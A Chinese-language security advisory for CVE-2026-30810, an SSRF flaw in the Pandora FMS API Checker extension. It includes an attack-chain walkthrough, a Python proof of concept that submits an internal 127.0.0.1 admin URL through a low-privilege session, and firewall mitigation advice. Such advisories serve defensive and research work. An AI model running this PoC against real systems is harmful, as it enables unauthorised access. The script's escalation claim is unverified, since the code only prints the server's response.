CVE-2026-30810 Pandora FMS SSRF导致权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-30810

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pandora FMS

漏洞概述

Pandora FMS在版本777至800中存在一个严重的服务端请求伪造（SSRF）漏洞。该漏洞位于API Checker扩展组件中，允许低权限攻击者通过构造恶意请求触发漏洞。成功利用此漏洞可能导致攻击者绕过安全限制，实现权限提升，进而对系统的机密性、完整性和可用性造成严重影响。CVSS v3.1评分为8.8分，属于高危漏洞，建议受影响用户尽快修复。

技术细节

该漏洞源于Pandora FMS的“API Checker”扩展组件未能充分验证用户提供的URL输入。攻击者首先需要具备低权限账户访问权限。接着，攻击者利用API Checker功能，构造包含恶意内部地址（如127.0.0.1或内网管理端口）的HTTP请求。由于后端服务器在处理该请求时未进行有效的网络边界检查或协议限制，服务器会代替攻击者向该内部地址发起请求。攻击者可以通过控制请求参数和响应内容，访问受保护的内部管理接口或元数据服务（如云平台IAM凭证），从而窃取敏感信息或执行特权操作。这种SSRF利用方式最终使得低权限用户获得系统控制权，完成权限提升，并可能导致后续的数据篡改或服务中断。

攻击链分析

STEP 1

步骤1：获取低权限访问

攻击者注册或获取一个Pandora FMS系统的低权限用户账户（PR:L）。

STEP 2

步骤2：访问漏洞组件

攻击者登录系统，导航至API Checker扩展功能页面。

STEP 3

步骤3：发送SSRF请求

攻击者在API Checker中输入恶意的内部URL（如指向本地管理接口的地址），利用服务器发起请求。

STEP 4

步骤4：权限提升

服务器响应内部请求，利用返回的敏感信息或直接操作内部接口，将当前会话提升至管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url, session_cookie):
    """
    PoC for CVE-2026-30810: SSRF in Pandora FMS API Checker
    """
    # The endpoint for the API Checker extension
    api_checker_url = f"{target_url}/pandora_console/index.php?sec=extensions&sec2=extensions/api_checker"

    # Internal target to access (e.g., local admin panel or metadata service)
    # Adjust this payload based on the specific internal endpoint that grants privilege escalation
    ssrf_payload = "http://127.0.0.1/pandora_console/index.php?sec=workspace&sec2=godmode/admin_access/manage"

    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }

    data = {
        "url": ssrf_payload,
        "submit": "Check"
    }

    try:
        print(f"[*] Sending SSRF request to {target_url}...")
        response = requests.post(api_checker_url, data=data, headers=headers, timeout=10)

        if response.status_code == 200:
            print("[+] Request sent successfully. Check if privilege escalation occurred.")
            print("[+] Response snippet:")
            print(response.text[:500])
        else:
            print(f"[-] Request failed with status code: {response.status_code}")

    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target and low-priv session
    TARGET = "http://192.168.1.100"
    SESSION = "attacker_session_id_here"
    exploit_poc(TARGET, SESSION)

影响范围

Pandora FMS 777

Pandora FMS 800

防御指南

临时缓解措施

建议立即限制对API Checker扩展组件的访问权限，仅向受信任的管理员账户开放。在服务器防火墙层面，配置出站规则，阻止Pandora FMS服务进程访问内部回环地址（127.0.0.1/8）及链路本地地址（169.254.0.0/16），以防止SSRF攻击转向内部敏感服务。同时，应密切监控低权限用户的异常API调用行为，直至完成官方补丁更新。